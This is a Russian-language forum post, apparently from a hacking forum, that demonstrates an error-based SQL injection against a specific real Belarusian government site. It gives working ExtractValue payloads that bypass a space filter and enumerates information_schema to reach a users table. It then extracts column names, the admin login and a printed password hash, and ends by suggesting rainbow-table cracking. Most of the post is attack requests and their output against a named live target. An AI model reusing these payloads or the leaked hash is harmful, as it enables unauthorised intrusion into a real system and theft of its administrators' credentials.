Сообщение от
FreShBY
FreShBY said:
http://gtk.gov.by/ru/press-center/1'
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1
Результат:
Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x257573657225)and(data_length>0)))))='1
Результат:
Код:
Code:
customsnew.users
Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_name)from(information_schema.columns)where`table_name`='users'and(ordinal_position=1)))))='1
Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат:
Код:
Code:
ID,login,password,name,email,comment
В таблице users всего одна запись. Получаем имя
Запрос:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
Результат:
Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)from(users)where(id=1)))))='1
Запрос 2:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(password)from(users)where(id=1)),32,1))))='1
Результат:
Код:
Code:
79e4b4438aba2b6d8e1caf9568e73e12
Расшифровываем хэш по радужным таблицам.
Результат: